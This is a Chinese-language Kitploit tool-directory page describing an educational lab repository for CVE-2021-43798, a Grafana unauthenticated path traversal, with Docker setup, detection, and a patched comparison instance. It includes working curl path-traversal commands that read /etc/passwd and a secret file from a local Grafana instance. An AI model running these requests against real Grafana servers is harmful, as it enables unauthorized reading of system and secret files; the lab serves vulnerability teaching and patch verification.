Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/shivamg2004/-ine_shivam_gupta_23104003
容器安全漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试学习与教育实验室与实践

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
GitHub
shivamg2004/-ine_shivam_gupta_23104003

-INE_Shivam_Gupta_23104003

CVE-2021-43798 Grafana 未授权路径遍历 - 安全实验室 | Shivam Gupta | 23104003

查看仓库
6小时46分前尚未审核

CVE-2021-43798 — Grafana 未认证路径遍历实验环境

仅供教育用途。 仅在隔离的本地机器上运行此实验环境。切勿将其暴露到互联网。


CVE 摘要

字段详情
CVE IDCVE-2021-43798
产品Grafana
受影响版本8.0.0 – 8.3.0
已修复版本8.3.1+
严重程度高
CVSS v3.1 评分7.5
CWECWE-22 — 路径遍历
需要认证否
攻击向量网络

前置条件

  • Docker Desktop(正在运行)
  • Git
  • curl

环境搭建

root@kitploit:~
git clone https://github.com/YOUR_USERNAME/INE_Shivam_Gupta.git
cd INE_Shivam_Gupta

启动存在漏洞的环境

root@kitploit:~
docker compose up -d

验证:

root@kitploit:~
curl http://127.0.0.1:3000/api/health
# Expected: "version": "8.3.0"

打开 http://127.0.0.1:3000 — 登录:admin / admin


利用漏洞

root@kitploit:~
curl.exe --path-as-is "http://127.0.0.1:3000/public/plugins/alertlist/../../../../../../../../../etc/passwd"
curl.exe --path-as-is "http://127.0.0.1:3000/public/plugins/alertlist/../../../../../../../../../etc/lab_secret.txt"

预期结果:返回文件内容,HTTP 状态码为 200 — 无需认证。


检测

root@kitploit:~
curl.exe --path-as-is "http://127.0.0.1:3000/public/plugins/alertlist/../../../../../../../../../etc/hostname"
curl.exe http://127.0.0.1:3000/api/health

如果返回 hostname → 存在漏洞。版本 8.0.0–8.3.0 → 存在漏洞。


修复

启动已修复的实例(Grafana 8.3.1):

root@kitploit:~
docker compose -f docker-compose.patched.yml up -d

验证漏洞利用已被阻止:

root@kitploit:~
curl.exe --path-as-is "http://127.0.0.1:3001/public/plugins/alertlist/../../../../../../../../../etc/passwd"
# Expected: {"message": "Plugin file not found"}

停止实验环境

root@kitploit:~
docker compose down
docker compose -f docker-compose.patched.yml down

参考资料

  • https://nvd.nist.gov/vuln/detail/CVE-2021-43798
  • https://grafana.com/blog/2021/12/07/grafana-8.3.1-and-7.5.12-released-with-moderate-severity-security-fix/
  • https://cwe.mitre.org/data/definitions/22.html
下载工具